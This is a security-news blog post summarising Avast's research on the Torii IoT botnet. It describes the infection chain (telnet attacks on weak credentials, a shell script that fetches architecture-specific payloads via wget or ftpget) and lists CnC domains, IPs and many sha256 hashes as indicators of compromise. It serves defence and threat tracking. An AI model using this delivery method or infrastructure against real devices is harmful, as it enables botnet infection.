Torii Botnet

 In Botnet, Business, Exploits, IoT, Malware, News, Threat Intelligence

Security researchers at Avast have discovered a new malware strain that uses comes with a quite rich set of features for exfiltration of (sensitive) information, modular architecture capable of fetching and executing other commands and executables and all of it via multiple layers of encrypted communication named Torii.

We have already seen some attacks against our Canadian clients.

The infection chain starts with a telnet attack on the weak credentials of targeted devices followed by execution of an initial shell script.

The script initially tries to discover the architecture of the targeted device and then attempts to download the appropriate payload for that device. The list of architectures that Torii supports is quite impressive: including devices based on x86_64, x86, ARM, MIPS, Motorola 68k, SuperH, PPC – with various bit-width and endianness. This allows Torii to infect a wide range of devices running on these very common architectures.

The malware uses several commands to download binary payloads by executing the following commands: “wget”, “ftpget”, “ftp”, “busybox wget”, or “busybox ftpget”. It uses multiple commands to maximize the likelihood that it can deliver the payload.

If the binaries cannot be downloaded via the HTTP protocol with “wget” or “busybox wget” commands, it will use FTP.  When the FTP protocol is being used, it requires authentication. Credentials are nicely provided in the script:

  • Username: u=”<redacted>”
  • Password: p=”<redacted>”
  • Port for FTP: po=404
  • IP of the FTP/HTTP server: 104.237.218.85 (This IP is still alive at the time of writing this post.)

CnC Servers

The addresses of the CnCs are once again encrypted by the aforementioned XOR-based cipher. It seems that each Torii version contains 3 CnC addresses. The campaign that is currently running tries to get commands from CnC servers running at:

  • haletteompson.com
  • tillywirtz.com
  • andrewabendroth.com

It tries to communicate with the first domain from the list and moves to the next one if it fails. In the case of failure, it also tries to resolve the domain name via Google DNS 8.8.8.8.

These three domain names have resolved to IP 66.85.157.90 since September 15, 2018. Some other domains hosted on the same IP are also quite suspicious:

  • tillywirtz.com
  • akotae.com
  • eonhep.com
  • reeglais.com
  • psoriasiafreelife.win
  • blurayburnersoftware.com
  • haletteompson.com
  • andrewabendroth.com
  • bubo.ccwww.dushe.cc

That so many strange looking domains are hosted at one IP address raises concern. Furthermore, the CnC domain names resolved to a different IP address (184.95.48.12) before that.

Some more digging turned up another set of ELF sample belonging to Torii with three different CnC addresses:

  • eonhep.com
  • akotae.com
  • reeglais.com

They all resolved to the same IP (184.95.48.12) in the past and, for example “press.eonhep.com”

Based on our research and what we found from Avast, here are the Indicators of Compromise:

Category Type Value
Network activity hostname editor.akotae.com
Network activity ip-dst 184.95.48.12
Network activity ip-dst 104.237.218.82
Network activity hostname trade.andrewabendroth.com
Network activity hostname web.reeglais.com
Network activity ip-dst 66.85.157.90
Network activity hostname press.eonhep.com
Network activity hostname top.haletteompson.com
Network activity ip-dst 104.237.218.85
Payload delivery sha256 306c9c4599271868be7247edaa76d1bf7b9032b2b58717258a13fc6ce678239e
Payload delivery sha256 1bd24c1a0583e9a8b8e618814ec057134eb392ec3bc093f8b5e44a188db7af64
Payload delivery sha256 1225414ea958d4eaf00e2f1fed574dca6d8e000e8a9a1f77fc45406a3089d190
Payload delivery sha256 32d8d20184e002060778b610e02a27b49c28ac2024e61cc5440f515fee041e6c
Payload delivery sha256 2d4740456d8aaa175e2bea25a27504705ba08eb76af102abf85c8db479d7aeaa
Payload delivery sha256 0ff70de135cee727eca5780621ba05a6ce215ad4c759b3a096dd5ece1ac3d378
Payload delivery sha256 4614ffa6986037c2264a5d480bb0dfbdf49ac6e13f52d650f84d697183f120fe
Payload delivery sha256 02577b485c994c7ee04904c961f4e1711f8210aa5749aef2cfb21f59f223147d
Payload delivery sha256 144d8ffe31f0aa0af9ab0ef9c77d8f1aceee603b7277ae62417812398c57c36b
Payload delivery sha256 2c1ffc4a7995612266eaf27dbf89f5c881ab1d92c88cd8444bd61c2f06c49615
Payload delivery sha256 40f914cad718d35e6cbe475edd9527e10b9709f86b48a72635154b68f78b9416
Payload delivery sha256 25bd26e0e4dceb78419bdca8c8f5556c149535b482a914de5d5b98bcf85b14f6
Payload delivery sha256 42d0f4c13e9c5400591daeb31a5f3ed71444d3e8088ad763ffe6de6046b5448d
Payload delivery sha256 17ccbe694e580c0f19fc98e3e2e6e5ae1b7f2b2cea81eb67c4d7b51c04c213a1
Payload delivery sha256 24a21610e25a3fbd02fa89619b099f7eb98143803ae8f489a3169bdaf6187bed
Payload delivery sha256 1f6e184c788f507098367b3e196dd9fda2cace1e84c59dd112bb157d54f3ee42
Payload delivery sha256 227a6bf9860512e17c2a17280a813b46e36b05fd48b461d87d48ee9a46e4a994
Payload delivery sha256 1bfba24ec84f045d6bb3b474c577e4f53399f538bcc0a2525ad0868fa444dbd8
Payload delivery sha256 07482bd77a2b341ff6f32b511ffa9b960e58413bc1c44cf7cd57acb4956bb2c6
Payload delivery sha256 32996f265a0555de5a52aca144785c897f715f21d59493940baebec6e572dc80
Payload delivery sha256 2d185e68f7c690eaf63ee2432653c67cef3f92eedb4067264d3774558f1e152a
Payload delivery sha256 269f81f71881216e86f8954793f49b1f2d89ea5bead20bfe09bac39b40a4caf8
Payload delivery sha256 346641936fc2ab1b02c32bf76dc1c9e417e5d59fc6357ee9f8042bf2a211af06
Payload delivery sha256 2a8a8771d088698b11c69012b19fd0e0de76eab5f67ffdb80020292b3069f878
Payload delivery sha256 3f9128b215e8f098ce868eef7813a51dc5af3e6b5bf693475d5e520ce975cc46
Payload delivery sha256 367d68750c4e5b5d6f88e69fa92c8e7c5102902ac787a44d6c2560d0ff9b34de
Payload delivery sha256 273890d63aead38a9804636c1c26ee09c56e4e010deb2526d60830529bf1a36f
Payload delivery sha256 1abfaaef3c98ea00b161d0375a99fbd978ab6cb1aa1bda20bdb39661102ea379
Payload delivery sha256 1a932c52fe55705479fc94c8f6d4ceeb46a2876e5b461b4b1cf8a091f2a164d9
Payload delivery sha256 35acb01be6d6d50b53c779f37aa484614bb7ee75e2f1d601b7c59100315e8174
Payload delivery sha256 383a70a1eb3a7eb4d26bb2da83115f5ded9ccc345afef8d5c291c53f970d1b42
Payload delivery sha256 2ba9a4f294e86fd97abfe66daa0dec1b45708d1f31a17ab488ffbd0aeb892bfb
Payload delivery sha256 0c4019e8f619cb49a2fef2f661e26ca41f7264f74b7690358faede4fe14a1738
Payload delivery sha256 471852a417b248f78edaa1146271dcb82797c3f767d26937b2beee6cfc75e3f2
Payload delivery sha256 2aa882d8cb87812e8a1d304636ab0632d9594607fbe40feb8f75b0a340548190
Payload delivery sha256 209e1a9884e2ff869639f4cb11179b543b0aa65faa97fb4fa58ede80f8ad3f2c
Payload delivery sha256 06d569346690a213608b6fb8a4563efdaefc60bc4266a71efe5e9481faf78185
Payload delivery sha256 00ff0608a47ff4eb3729e2f7b6da4dc2f9d38c0c5f7442f713f8187990a71239
Payload delivery sha256 038c4f9431e0684489a845cf7e5926d3c72d1d21533dce58a0f2d6de88088512
Payload delivery sha256 3bb3a370af8aaefefff36a0c408ddf41f49c1a8bf176a68c2bf3f042bc8a2c5d
Payload delivery sha256 0f390b3f429bfca61e0240a616f9071e9ffe91f55ca06623c7f2822bb9e2137a
Payload delivery sha256 443754d1aef9e9d3716868d9db9322a82cdac764b57b973822aff68e99e1f056
Payload delivery sha256 0887cbf55820b8adbdcdaa1a6273f9f92b21b64da6558a3ebd3c15b972af0f71
Payload delivery sha256 392e6c7f5c948f01a4ab36eba0d29b9f4078215a47a004493a9b7758fffb5a15
Payload delivery sha256 52b37b930ecd4bdb7fce0eb8e7697f2bf10a8e8e6a30abfff7b4578c821b4277
Payload delivery sha256 5df29ce84162e032e90936977ea2c1b7f9cea01699bebd6f17a4d49e2aa9dd54
Payload delivery sha256 ea6f3e92820a768f66b917e1f4fd5ba2738fcd7cd77d69c85e3de3afee4ff9f1
Payload delivery sha256 892f28d6c74fd1519585d3f999dd609781707cb1aa54d8b3f50e0a23e96a66a6
Payload delivery sha256 fdc6df8453089c128b7761561e2855e7b91c4bfcacb845e085c5da951cce746f
Payload delivery sha256 4fe3d7d4d609bc54aa56d7ff4864bab9521eecac9e6fa3d8669572fd080a195e
Payload delivery sha256 d1528e48299ba5f034adcb7747e5867d31e6c78b191a4f432a8db5b72aae6864
Payload delivery sha256 5538196cff4c3ca86b9e70cdccbe6498bd479c48c5b6fcd1d372116a1be4da9f
Payload delivery sha256 edb87fef660d88e39308c2b38f9fd4d9965491265dc86102883042e6cef3e90f
Payload delivery sha256 59192079e310a6b7147a0e752eeb27371670a7c7a5252163fc9bdb8b139d14cb
Payload delivery sha256 b739da4911c8ad21953eea390b2ec2f5f15656f63b1577bbe2dbd4e0a9dfda8b
Payload delivery sha256 9819d1f2d0a13e38a6f0e2e7c6b8d57acddddbcf68787cc200b9fb36dbc125b2
Payload delivery sha256 b5c2b4d5eba78dfaee6647e0b0684551e86139efd6af5e3a68603aaacad91e5d
Payload delivery sha256 abc5d33ff0c9870e99e288e15500dfdca77e39c3fa2c442410678cf9bd3009b7
Payload delivery sha256 bc96d9f5838d10633d7750c36228d7511fcf79059c0daf95ffa5a3fdc7e7b6ef
Payload delivery sha256 b67f812bb3796092a245d706d24cdc02845dffaf421a46ab9b8a37dec5cb6983
Payload delivery sha256 a9947830cebe818ce3f338e65a5d0e926e05fc26a857501396f5e8f73608e4ea
Payload delivery sha256 8e3a282bf25e767dc97b3f8b5d85130d90ffe7cc398904a51f5b3a2a92515e4f
Payload delivery sha256 a16588cbf867c32d42280dfd1917b7c7022b5e1905b692b795df950cbf17a77b
Payload delivery sha256 b4f0bfb5de6a85246ff4099cae25a954cde6e2d30a96e3c512114dab716f3647
Payload delivery sha256 6b76577f7be5bb6b95c7842dbc7c99a275817d5600a5de43e44fc511143a50f4
Payload delivery sha256 cdf8e64c0d599cf02f3b952ffcbf8b5b120c79ed92f11146e47fe7575b507402
Payload delivery sha256 81319e94dc4e5be2e95470338c27a1e7c7c0b3338cc7496f8b21e102b4d8ecdb
Payload delivery sha256 e7c2f68655ec31b35b83f2a6080420506227e35072e86655665b187b25106b5b
Payload delivery sha256 4b7c5fc27ad6cacce00f97a028972d2826ab207ad32fc5a6d8b3ae524ec8d110
Payload delivery sha256 cea9facc5f4907173183a781449bf6a9cde43de777ea875cec2f8d19c9d5a49a
Payload delivery sha256 4ea59dd3992e9589bde157c5e572a29fc480c3c5ab7b2822c98183d03a60d3df
Payload delivery sha256 9afbc3214464cecfab9bf2f4d4c26e3f0cb6fcc50b79eac97991f1f882f9e840
Payload delivery sha256 7ebfe6c14e3f182212f189d0e3db5ec29c22e434a1cbeb8ce30eeccc7a8999a6
Payload delivery sha256 9ef5864f8dc8789f400786512c45c99801a6634c19a97cf71971c0515c8419ef
Payload delivery sha256 e23ffe91953b1208f0c2d857d4151e136934c18e72a8587fe944f288b92bda88
Payload delivery sha256 bbe3a4e1cfba6c4327c3bdd959b5da8779974e427b29ab8ee328cdb4963d0132
Payload delivery sha256 5e1adebb418bd29463c452371ae064b83f7dfa9f22f674624c4dc4c789af09af
Payload delivery sha256 4c48f63224ae629a0943dca68e877eb6339428e134c6a0fb5178c05e599e57df
Payload delivery sha256 efa71bbcc7059f179b9688f27ead593d5448ac8d4487eff39e2a22ed15b70e9d
Payload delivery sha256 6a3789a8ac221977a999407f09c64cddf3d0782581e581bff22f54a563a9b02a
Payload delivery sha256 73262a541ef10834fc929350a60076dedb04f9c6d11ed1b7189273b4aff9af93
Payload delivery sha256 7da707b731c917fcf0d994686d735450352bf44ffb0dddd08ff968b8bcb4ed0f
Payload delivery sha256 72013fce66799ab8cde91415ac487a2c52d4d9a3620ebc82866a91ad469030a4
Payload delivery sha256 55ad48808519f7613550e6619d0b1ab1a90a5f3ff924fa66b0427a6357d4cd3a
Payload delivery sha256 c41c857c09a0e1f5c3c56ac08867cd22420898baa33279516e70d50b9cc0ae90
Payload delivery sha256 da69ea5eb15cca50396fde5af4af44cd9cdc251d2c53d05d0c4887442719c3dc
Payload delivery sha256 849dccf7e39c26019f122af433615797de09f5ede63e9a2389862c9f4c232a80
Payload delivery sha256 b43a1673f7876fdb0a0d08ed18a708b4d2ae5d33a86f5862a0b14c3f92f6cfcf
Payload delivery sha256 f58fa2362f475d57ca29787838816ae010b5b316034f7ea7780eb2b30e6b1932
Payload delivery sha256 72b1ee4b17ef09c201803acf9947f58b406cf691e33c269ef841840cca895530
Payload delivery sha256 6fc69e0ab0d5df4cd502a19254d6ca6556a86b76686d8e57d98a4ae2e8b48b15
Payload delivery sha256 84d866ecc7b2e87b9bfbd606a37b3c07f557544d8cd4d04ac71cdc793995cd98
Payload delivery sha256 5c32e6cec60cf36661ac949f927a7781375d3f0e70f456e1b4c695f986df7a15
Payload delivery sha256 59517abd1e7c62bf980d79a67be0894044feb44c27f83b83c4456b58c459eec1
Payload delivery sha256 ffe12d23c54688097ed1f3100d99d6bebef783c9ca586c652d5d50dfa1026560
Payload delivery sha256 c28448c0b9a0aebb7e30151e0e9ff50d7c75ca2ef9cc2c0de464d994d2a302e4
Payload delivery sha256 6dcc5fc6968be45e29ba92c9ad0f5fe18cd5f16654349943250ad1dd4b4276b4
Payload delivery sha256 b1a08f1fc8bb53ea6e4ea2431d95a1024feb64a29f88af7d1183ac66f08aba47
Payload delivery sha256 a32d2063622ecb57a0c3d110a33d7d22bcd8a7133f9ace7ee248a0b0a9c3c246
Payload delivery sha256 b137cb468e5175b46741f592dd8970eb97900f3509f8102c45d85aefdd6e4717
Payload delivery sha256 5042750b743ea87a58b3698bf5ef5b637c80216555d14a4db2b2753874c06600
Payload delivery sha256 c89c6f572debc1f48fa2b41c25ecc170d851802bee95e3cb9020eb8b894c5552
Payload delivery sha256 b1e3a3cc39eef3710129b19b601c9facb879438efe6ecc6c666f6078193be208
Payload delivery sha256 570c9049d8fa67f08d6ffb1c9aad5a939afc49e2a97a680c308f47489de7aa86
Payload delivery sha256 ceb33e7de647458f4a05fb0203c6806f764618b772914378652773bc6def9f73
Payload delivery sha256 d8adfb91b8e2145b8bd43c04eb2132a2febce16dea673315be7ac8359d0a1b98
Payload delivery sha256 9b110ca9529eace57a2ebee17ab05dd2f8a7d39a7aedfb3d2aeda7c15716d216
Payload delivery sha256 df95342170e826696775c2e061a32e52e9388ea3982a61ea9e63a38fdc330902
Payload delivery sha256 d679bb947a6080925628f789be4577ef103b6e73937146f211d695e4329b1c27
Payload delivery sha256 eb0d9ca1cc57eb17932814c424f3c7b736a9610711357e57d622d42179f2603f
Payload delivery sha256 5d4b009575c459ff21a85a52180abde12eed3ed47cf21cb9762ad20df87a3943
Payload delivery sha256 db1f499bc764ed9a36357e99f1e43088afe6c94ec5584ee062d28ddd87013445
Payload delivery sha256 d7c7e786e443adc5cfedbade01fe9c19665fb758a6be323c31dd6f347e7d462c
Payload delivery sha256 bb88ada88047a0accefcce3837557c7087ad0577ba609c9b90b9af4110dc53a4
Payload delivery sha256 77b961d759130a9243bc92554e3d81380b93be0b9ed0625b685fb42486858b75
Payload delivery sha256 c9f125b56d347e9d9e6c4513ceec4065ebdbd672c21c7b96406e516ea7b48141
Payload delivery sha256 90a2a31d45a4254091d43a98a60ed005e03f14bb9270d18bd1ba323b057ee0db
Payload delivery sha256 471fc2b8a7bdb4c488e592a64c1a8a1cef749c601af337b6ff60c1c30e1d29a3
Payload delivery sha256 48fd7eef170bc5778e843c389f42a4af2d86f482ca9d6c7282623bde48976cd1
Payload delivery sha256 cd43069f72e603269ecddfc7686fa92d24b3c4ffe7e3ced43e6c1aebe9784327
Payload delivery sha256 dd680ee04472a3ca14651a83927abe2a861344c2d5b72c3ae503fb8649cfa280
Payload delivery sha256 c57ead1291b1ead44f1f553da58513b63f59bf1183547ff2276182b955611ce2
Payload delivery sha256 c940e025c018a20536fd9c7a439bdb49cef192917f3eb5643092608a78fd278d
Payload delivery sha256 90e4ff3d5ee6c087449531226428b89e64261aed47462e1c74c0220f9ada8826
Payload delivery sha256 ca3c515555fd50a7a1e2279eb17bf90a03eb250472e46b62f82a428bca6c4b89
Payload delivery sha256 5c74bd2e20ef97e39e3c027f130c62f0cfdd6f6e008250b3c5c35ff9647f2abe
Payload delivery sha256 bcda94ac8ed07ef72457f2ce13999b1bcd78cbede244b6e96245d4b4f77447c4
Payload delivery sha256 cf140008fbbefd3544a7780002d38685983486fec38b37e0ca99259af1c8cdbf
Payload delivery sha256 73f66ab1f244f6fd92fc792cdc420603d15c1e4f750be3f41a0aa1ead414e21c
Payload delivery sha256 7103c504d1932ccc96fdcc635e23aa1c43a8d243af6e36f502d91845a4ec9633
Payload delivery sha256 9c94490571bbe906c62ddd6fd1f7caa709d4d7782af222488478847d3d61ef45
Payload delivery sha256 58c586870ea4d7392f9d8eddf33d0e138be20284ac0b0027f7c0eee274eddf58
Payload delivery sha256 5a72aeeffc08888bab9d8714c1e342b04a85d782c9b2e0e61704b5adab3438bd
Payload delivery sha256 7dab439b50e7d388dd1d5fad8af7c33ad239f2ca6a652ba07aafd6737d9bb2ec
Payload delivery sha256 57b00ed5024ab38abc540107b550c2cd3abd1c6b8ccb320509512f90947c6585
Payload delivery sha256 a5a91f6ca72bb48409f5d3e7f6ce8991d350b18c4b24ce4a512de5a4ca43a2b5
Payload delivery sha256 ed792575dbd018bd16c175dc0bfef4f648313c2795bb85aaa1bde45f813f1c27
Payload delivery sha256 9ee26d7ea251b7d5733deeb32287f7e9c8a5c7098c80512c0fb8a5de17191cd8
Payload delivery sha256 48d015ba51c0c80b2a0645a5b9fe2f86784645f342319608156ce742fd0bbbf4
Payload delivery sha256 93cb0b73c125b2669d6739714e5878bd543b352bd6e309b44ac66518da64b3be
Payload delivery sha256 b0e5dc5c3aa54cfce8df0ddca05cf75cab7474d7db82b51ff8e53ececa27b072
Payload delivery sha256 d4f001919ee431d81955187eda58cabffcf40e1d4b760e6830c5924df1aa1ef8
Payload delivery sha256 8a450d3244e3219598fc34ef062b68182baa7e5d2c5dece4e480d4c4b510a3a5
Payload delivery sha256 d39e5ff2489b52a2e3a0baf40de82123b22e9d6867055d6a52988d60b410661c
Payload delivery sha256 7e7e05a8964e1c57b719de132c4cc7ecd2b914f79c56254517c26c932f60712c
Payload delivery sha256 64b9fae0c89442dcaee7d68b004dc2e975d28b571b3a63d75416d483be418d0c
Payload delivery sha256 c463446a481d2cffccc9688509fd26251a76cf47e45cb7e8ad997c1e681691fb
Payload delivery sha256 f20178b7d8d12a91c5cb61bb68781a55d1f95e2a9659f8dc6c09111e346bda80
Payload delivery sha256 5ed158633217a26f440cae8a8171c02f355b3a7b4a405398f2d36882c1160943
Payload delivery sha256 7d28d83e2611a1f859f4fc9ed69a6d4d5ebc352340314949922d24032c670f04
Payload delivery sha256 f77f18ce41963fbb914a1bc1d007f67942b6a116ace10d93efe69c619e38a46a
Payload delivery sha256 4b1a29c91ae12d9744bd7aa2bdf1e5b0b01da1338564c4328cc1205711a8e90d
Payload delivery sha256 bb9138b6847e17c9df6b5babb1c71eb34c99b7e0a9b6a612499ede5e872fd7c6
Payload delivery sha256 cf3bfd3f5401c2cf45b70c61dde33cc758839644249183958235f6471fa36702
Payload delivery sha256 f9ec6c70e8b44a72f52e6d683d026ed6ab1b9f5d153d2f083ed3ba8b4a30fdec
Payload delivery sha256 e6316a817f682a81b13ba8bd883439ca53d40c4735e279c71a33887259eeac38
Payload delivery sha256 4da53d1a2598b69d27c40947fa77d6d6b526e36ce624e7ce140984a6dd3a10d8
Payload delivery sha256 f19436b851e982dc741a4b0d289f79fac768de6a40cb8b9584b3416023b69e2c
Payload delivery sha256 bb91790dcbc2450ea6a91e1efdc8c70f54edb8a3c53361e708f32b19adef35a6
Payload delivery sha256 ab38ff87c0cd09e4888242357ac5d6fc2aaf6a6752e31c3406c7ca30530f9fae
Payload delivery sha256 7d104ef05f8e6fd736e8e040e3796959dcb9531a193a3055b116d02584213946
Payload delivery sha256 8bdcf50127f075545cf7a48ffff68e51b9c52c006da8ab6b01595f821231c9e1
Payload delivery sha256 df1e57a0cd4f6475d41949dff1cf2af426c52a6107c3039745f135370031e49d
Payload delivery sha256 f202e01a8cbd83f88dd6e1bacc1d4636e88004612c1f6e1addce5e231aecf7ae
Payload delivery sha256 48c3d8972402a2a4cb5e64a5a7ea7e55774168e1ac085eb1504bd09d0acfd83b
Payload delivery sha256 dce1dafee27ce39a5ac76d2055803106a5b04d30ac467fdaec3859271e08c7fc
Payload delivery sha256 4786c7fb232f96f7cb8901d16b0dd4e5f74b8a4b2bf1eed9da5ac48be2002b2e
Payload delivery sha256 83679f821343fc1832ef70ff02bca5b94d6b869d773c1783c39fb0705ed03d99
Payload delivery sha256 ca0b8c111ed53c0f175356c9343603eac083fbc5432daa722befe81dcdf36d79
Payload delivery sha256 db40ab4d6784bf0fcbe63ce4a4d7da31b97519abe79f13ef0f315947351b08d3
Payload delivery sha256 65171b254f81842093d8677fed39f52c562820570b6ae906de11b239183d48c4
Payload delivery sha256 b6c3a4292f2b32e501c480728e0b2b7e4fa258dd057d6274b323eb62c2df4628
Payload delivery sha256 ac04a55dbfdadfdaa5b2ba4ec6d74a6e41024b89c378ed1495d8e71db8db4232
Payload delivery sha256 802ee129daef90e906ea869668aeda81fe5d00caa44751674b37dfc8734bffa8
External analysis link https://blog.avast.com/new-torii-botnet-threat-research
Network activity domain cloud.tillywirtz.com
Network activity domain top.haletteompson.com
Network activity domain press.eonhep.com
Payload delivery sha256 fd9ca00c70bd2afd8b5ac8f6b2349527e62a38ba6db549df9cfb90640aba401f
Network activity domain psoriasiafreelife.win
Network activity domain trade.andrewabendroth.com

References:

https://blog.avast.com/new-torii-botnet-threat-research

 

Recent Posts

Start typing and press Enter to search